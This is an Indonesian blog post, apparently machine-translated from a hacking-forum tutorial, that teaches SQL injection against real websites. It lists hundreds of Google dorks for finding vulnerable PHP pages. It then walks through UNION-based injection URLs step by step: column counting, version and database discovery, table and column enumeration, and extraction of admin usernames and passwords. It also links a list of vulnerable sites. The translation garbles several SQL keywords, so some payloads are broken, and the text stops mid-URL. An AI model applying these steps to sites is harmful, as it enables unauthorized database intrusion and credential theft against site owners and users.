Sqli (alias Sql Injection Injection atau Structured Query Language) adalah langkah pertama dalam entri untuk mengeksploitasi atau hacking website. Hal ini mudah dilakukan dan merupakan titik awal dari yang besar. Sayangnya kebanyakan menghisap sqli tutorial, sehingga itulah sebabnya saya menulis yang satu ini. Sqli pada dasarnya hanya menyuntikkan query ke dalam database atau menggunakan query untuk mendapatkan otorisasi memotong sebagai seorang admin.
Mencari Situs untuk Inject:
Mencari SQLI Rentan duduk sangat mudah semua yang perlu Anda lakukan adalah beberapa Googling. Hal pertama yang perlu Anda lakukan adalah menemukan beberapa Dorks.
SQLI Dorks:Kode:inurl: trainers.php id =?inurl: buy.php kategori =?inurl: article.php ID =?inurl: play_old.php id =?inurl: declaration_more.php decl_id =?inurl: pageid =inurl: games.php id =?inurl: page.php file =?inurl: newsDetail.php id =?inurl: gallery.php id =?inurl: article.php id =?inurl: show.php id =?inurl: staff_id =inurl: newsitem.php num =?inurl: readnews.php id =?inurl: top10.php kucing =?inurl: historialeer.php num =?inurl: reagir.php num =?inurl:? Stray-Pertanyaan-view.php num =inurl:? forum_bds.php num =inurl: game.php id =?inurl: view_product.php id =?inurl: newsone.php id =?inurl: sw_comment.php id =?inurl: news.php id =?inurl:? avd_start.php AVD =inurl: event.php id =?inurl: Produk-item.php id =?inurl: sql.php id =?inurl: news_view.php id =?inurl: select_biblio.php id =?inurl: humor.php id =?inurl: aboutbook.php id =?inurl:? ogl_inet.php ogl_id =inurl: fiche_spectacle.php id =?inurl: communique_detail.php id =?inurl: sem.php3 id =?inurl:? kategorie.php4 id =inurl: news.php id =?inurl: index.php id =?inurl: faq2.php id =?inurl:? show_an.php id =inurl: preview.php id =?inurl: loadpsb.php id =?inurl: opinions.php id =?inurl: spr.php id =?inurl: pages.php id =?inurl: announce.php id =?inurl:? clanek.php4 id =inurl: participant.php id =?inurl: download.php id =?inurl:? main.php id =inurl: review.php id =?inurl: chappies.php id =?inurl: read.php id =?inurl: prod_detail.php id =?inurl: viewphoto.php id =?inurl: article.php id =?inurl:? person.php id =inurl: productinfo.php id =?inurl:? showimg.php id =inurl: view.php id =?inurl: website.php id =?inurl: hosting_info.php id =?inurl: gallery.php id =?inurl:? rub.php idr =inurl: view_faq.php id =?inurl: artikelinfo.php id =?inurl: ID = detail.php?inurl:? index.php =inurl: profile_view.php id =?inurl: category.php id =?inurl: publications.php id =?inurl: fellows.php id =?inurl: downloads_info.php id =?inurl: prod_info.php id =?inurl: shop.php lakukan = bagian & id =?inurl: productinfo.php id =?inurl: collectionitem.php id =?inurl: band_info.php id =?inurl: product.php id =?inurl: releases.php id =?inurl: ray.php id =?inurl: produit.php id =?inurl: pop.php id =?inurl:? shopping.php id =inurl: productdetail.php id =?inurl: post.php id =?inurl: viewshowdetail.php id =?inurl: clubpage.php id =?inurl: memberInfo.php id =?inurl:? section.php id =inurl: theme.php id =?inurl: page.php id =?inurl: shredder-categories.php id =?inurl: tradeCategory.php id =?inurl: product_ranges_view.php ID =?inurl: shop_category.php id =?inurl: transcript.php id =?inurl: channel_id =inurl: item_id =inurl: NewSID =inurl: trainers.php id =?inurl:? berita-full.php id =inurl:? news_display.php getId =inurl: option = index2.php?inurl: readnews.php id =?inurl: top10.php kucing =?inurl: newsone.php id =?inurl: event.php id =?inurl: Produk-item.php id =?inurl: sql.php id =?inurl: aboutbook.php id =?inurl: preview.php id =?inurl: loadpsb.php id =?inurl: pages.php id =?inurl: material.php id =?inurl:? clanek.php4 id =inurl: announce.php id =?inurl: chappies.php id =?inurl: read.php id =?inurl: viewapp.php id =?inurl: viewphoto.php id =?inurl:? rub.php idr =inurl:? galeri_info.php l =inurl: review.php id =?inurl: iniziativa.php di =?inurl: curriculum.php id =?inurl: labels.php id =?inurl: story.php id =?inurl: look.php ID =?inurl: newsone.php id =?inurl: aboutbook.php id =?inurl: material.php id =?inurl: opinions.php id =?inurl: announce.php id =?inurl:? rub.php idr =inurl:? galeri_info.php l =inurl:? tekst.php idt =inurl: newscat.php id =?inurl:? newsticker_info.php idn =inurl:? rubrika.php idr =inurl:? rubp.php idr =inurl: offer.php IDF =?inurl:? art.php idm =inurl: title.php id =?buy.php kategori =?article.php? ID =play_old.php id =?declaration_more.php? decl_id =Pageid =games.php? id =page.php file =?newsDetail.php id =?gallery.php? id =article.php? id =play_old.php id =?show.php? id =staff_id =newsitem.php num =?readnews.php? id =top10.php kucing =?historialeer.php? num =reagir.php? num =forum_bds.php num =?game.php? id =view_product.php? id =newsone.php? id =sw_comment.php? id =news.php? id =avd_start.php AVD =?event.php? id =produk-item.php? id =sql.php id =?news_view.php? id =select_biblio.php? id =humor.php? id =aboutbook.php? id =fiche_spectacle.php? id =communique_detail.php id =?sem.php3 id =?kategorie.php4? id =faq2.php? id =show_an.php id =?preview.php? id =loadpsb.php? id =opinions.php? id =spr.php? id =pages.php? id =announce.php? id =clanek.php4? id =participant.php? id =download.php id =?main.php? id =review.php? id =chappies.php? id =read.php id =?prod_detail.php id =?viewphoto.php? id =article.php? id =play_old.php id =?declaration_more.php? decl_id =category.php? id =publications.php? id =fellows.php? id =downloads_info.php? id =prod_info.php? id =shop.php lakukan = bagian? & id =Productinfo.php? Id =website.php? id =Productinfo.php? Id =showimg.php? id =view.php? id =rub.php idr =?view_faq.php? id =artikelinfo.php? id =ID = detail.php?collectionitem.php? id =band_info.php? id =product.php? id =releases.php? id =ray.php? id =produit.php? id =pop.php? id =shopping.php? id =productdetail.php id =?post.php? id =viewshowdetail.php id =?clubpage.php? id =memberInfo.php? id =section.php id =?theme.php? id =page.php? id =shredder-categories.php? id =tradeCategory.php? id =shop_category.php? id =transcript.php? id =channel_id =item_id =NewSID =trainers.php? id =buy.php kategori =?article.php? ID =play_old.php id =?iniziativa.php? di =detail_new.php? id =tekst.php IDT =?newscat.php? id =newsticker_info.php idn =?rubrika.php idr =?rubp.php idr =?offer.php? IDF =hotel.php id =?art.php idm =?title.php? id =look.php? ID =story.php? id =labels.php? id =review.php? id =chappies.php? id =berita-full.php? id =news_display.php getId =?option = index2.php?ages.php? id ="Id =" & intext: "Peringatan: mysql_fetch_assoc ()"Id =" & intext: "Peringatan: mysql_fetch_array ()"Id =" & intext: "Peringatan: mysql_num_rows ()"Id =" & intext: "Peringatan: session_start ()"Id =" & intext: "Peringatan: getimagesize ()"Id =" & intext: "Peringatan: Unknown ()"Id =" & intext: "Peringatan: pg_exec ()"Id =" & intext: "Peringatan: array_merge ()"Id =" & intext: "Peringatan: mysql_result ()"Id =" & intext: "Peringatan: mysql_num_rows ()"Id =" & intext: "Peringatan: mysql_query ()"Id =" & intext: "Peringatan: filesize ()"Id =" & intext: "Peringatan: require ()
Pilih salah satu dari mereka Dorks dan menambahkan inurl: sebelum(Jika mereka tidak memilikinya) dan kemudian copy dan pasteke google. Pilih salah satu situs dari google dan pergi ke sana.Misalnya url dari halaman Anda berada di mungkin terlihat seperti ini
Kode:http://www.example.com/index.php?id=3
Untuk memeriksa bahwa itu adalah rentan yang harus Anda lakukan adalahmenempatkan 'pada akhir url. Jadi sekarang url Anda harusTerlihat seperti iniKode:http://www.example.com/index.php?id=3 '
Tekan enter dan Anda mendapatkan beberapa jenis kesalahan. Kesalahan akan bervariasitetapi harus terlihat seperti ini
http://i982.photobucket.com/albums/ae308/blink1337/1.pngGambar melebihi batas yang ditetapkan. Klik untuk melihat image ukuran penuh
Jika happends kesalahan situs yang vulerable!
Juga Jika Anda malas Anda dapat memeriksasaya daftar situs rentan sini
http://allianceforums.co.cc/forums/thread-1249.html
Mendapatkan Jumlah Kolom
Setelah Anda menemukan situs Anda rentan langkah pertama yang perlu Anda ambil adalahuntuk menemukan jumlah kolom. Cara termudah untuk melakukan ini adalahmenggunakan pernyataan "order by". Yang harus Anda lakukan adalah meletakkan ORDER BY (jumlah) -pada akhir url Anda. Jadi seharusnya terlihat seperti ini.
Kode:http://www.example.com/index.php?id=3 ORDER BY (jumlah) -
Anda ingin memulai dengan ORDER BY 1 - dan terus meningkat nomor dengan 1 sampai Anda mendapatkan pesan kesalahan.
Sebagai contoh
Kode:http://www.example.com/index.php?id=3 order by 1 -http://www.example.com/index.php?id=3 order by 2 -http://www.example.com/index.php?id=3 order by 3 -http://www.example.com/index.php?id=3 order by 4 -http://www.example.com/index.php?id=3 order by 5 -http://www.example.com/index.php?id=3 order by 6 -http://www.example.com/index.php?id=3 order by 7 -http://www.example.com/index.php?id=3 order by 8 -
Katakanlah pada order by 8 - Anda mendapatkan halaman kesalahan. Ini berarti bahwa website memiliki 7 kolom karenaitu akan memberikan kesalahan pada sesuatu yang lebih dari 7. Jika Anda memiliki memori buruk Anda harus membuka notepad dan# menulis kolom yang Anda temukan.
[Gambar: 2-1.png]
Menemukan Kolom Acsessable
Sekarang bahwa kita memiliki jumlah kolom yang kita butuhkan untuk mendapatkan nomor kolom yang kita bisa ambil informasi dari.Kami melakukan ini dengan dengan menggunakan "Uni" "pilih" dan Jumlah kolom. Anda menempatkan mereka bersama-sama dalam Andaurl seperti iniKode:http://www.example.com/index.php?id=-3+UNION+SELECT+1 ,2,3,4,5,6,7 -
Untuk bagian akhir url, (1,2,3,4,5,6,7) Anda menempatkan jumlah kolomAnda ditemukan di langkah pertama. Sejak saya menemukan bahwa situs saya sedang menguji telah 7kolom Aku meletakkan 1,2,3,4,5,6,7. Juga ingat untuk menempatkan - Infront dari nomor id.Setelah Anda melakukan itu Anda harus mendapatkan sesuatu seperti ini ...
[Gambar: 3.png]
Halaman harus terlihat sedikit kacau dan harus ada 2 angka pada halaman.Ini dua nomor adalah nomor Colum kita bisa mendapatkan informasi dari. Kami akan menggantikan mereka dengan pernyataan-pernyataan di kemudian hari sehinggamenulis mereka bawah atau mengingatnya.
Mencari Versi MySQL DatabaseAlasan Anda membutuhkan nama database adalah untuk melihat cuaca atau tidak website ini bernilai waktu Andakarena database mSQL bawah 5 Anda harus membabi buta menebak nama tabel dan kolom.Jika Anda seorang pemula dan Anda menemukan bahwa database berada di bawah 5 saya mendorong Anda untuk menemukansitus yang berbeda.
Sekarang kita mengambil salah satu nomor yang kami temukan dari langkah di atas dan ganti dengan @ @ versionSebagai contoh, sebelum url kita tampak seperti iniKode:http://www.example.com/index.php?id=-3+UNION+SELECT+1 ,2,3,4,5,6,7 -
Sekarang karena kami akan mengganti 1 dengan @ @ version
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+ @ @ versi ,2,3,4,5,6,7 -Tekan enter dan sekarang halaman harus menampilkan nomor database.
[Gambar: 4.png]
Sekarang nomor yang kita miliki di langkah pertama akan diganti dengan nomor database. Seperti itu menunjukkan atasSitus yang saya pengujian memiliki nomor versi 5.0.45. Karena nomor ini adalah 5 atau di atas, kami akan terus bekerja padasitus ini.
Mencari Nama Basis Data
Selanjutnya kita akan menyuntikkan website untuk mencari nama database. Kami melakukan ini dengan mengganti @ @ versiondengan GROUP_CONCAT (schema_name) dan juga menambahkan + dari + information_schema.schemata-- setelah nomor terakhir di url kamiJadi sekarang url kita harus terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat (schema_name), 2,3,4,5,6,7 + dari + information_schema.schemata--
Anda harus mendapatkan sesuatu seperti ini ketika Anda pergi ke url itu.
[Gambar: 5.png]
Ini akan daftar nama database. Sekarang untuk menemukan mana yang digunakan saat ini menggantikan GROUP_CONCAT (schema_name) denganconcat (database ()) dan menghapus + dari + information_schema.schemata Jadi url sekarang harus terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3+UNION+SELECT+concat (database ()) ,2,3,4,5,6,7 -Ini akan menampilkan database yang digunakan yang. Anda mungkin ingin menuliskannya.
[Gambar: 6.png]
Mencari Nama Tabel
Untuk mendapatkan nama tabel dari database saat ini Anda perlu mengganti concat (database ()) dengan GROUP_CONCAT (nama_tabel)dan menambahkan dari information_schema.tables mana table_schema = database () antara nomor terakhir dan - juga menghapus+ Tanda-tanda dari serikat pilih. Sekarang url Anda akan terlihat seperti ini
Kode:http://www.example.com/index.php?id=-3 serikat pilih GROUP_CONCAT (nama_tabel), 2,3,4,5,6,7 dari information_schema.tables mana table_schema = database () -
Halaman sekarang harus menunjukkan nama Tabel. Anda mungkin ingin menuliskannya.
http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.pngGambar melebihi batas yang ditetapkan. Klik untuk melihat image ukuran penuh
Mencari Nama Kolom
Ini adalah persis seperti mendapatkan nama tabel Anda hanya mengubah nama_tabel untuk nama_kolom dan information_schema.tables untuk information_schema.columns.Jadi url Anda akan terlihat seperti.
Kode:http://www.example.com/index.php?id=-3 serikat pilih GROUP_CONCAT (nama_kolom), 2,3,4,5,6,7 dari information_schema.columns mana table_schema = database () -
Ini harus memberikan nama kolom. Anda mungkin ingin menuliskannya.
Katakanlah mereka memberi kami kembali nama cloumn
admin_usernameadmin_password
Mendapatkan Informasi
Sekarang kita dapat memiliki nama database, nama tabel, dan nama colomn kita bisa menempatkan mereka bersama-sama danmenarik informasi dari mereka. Lakukan untuk ini kita perlu menempatkan berikut di url kami.Kode:http://www.example.com/index.php?id=-3 serikat pilih 1, GROUP_CONCAT (ColumnName, 0x3a, columnname, 0x3a), 2,3,4,5,6,7 dari databasename.tablename--
Sekarang ganti columnname dengan nama kolom Anda ingin informasi dari. Para 0x3a akan membuat: untuk memisahkan informasiuntuk Anda. Masukan sebagai nama kolom yang Anda ingin ingat untuk tetap format. Juga mengganti databasename.tablenameDengan nama database dan nama tabel nama-nama kolom di mana masuk Setelah semua ini url Anda harus terlihatseperti ini.
Kode:http://www.example.com/index.php?id=-3 serikat pilih 1, G
Tidak ada komentar:
Posting Komentar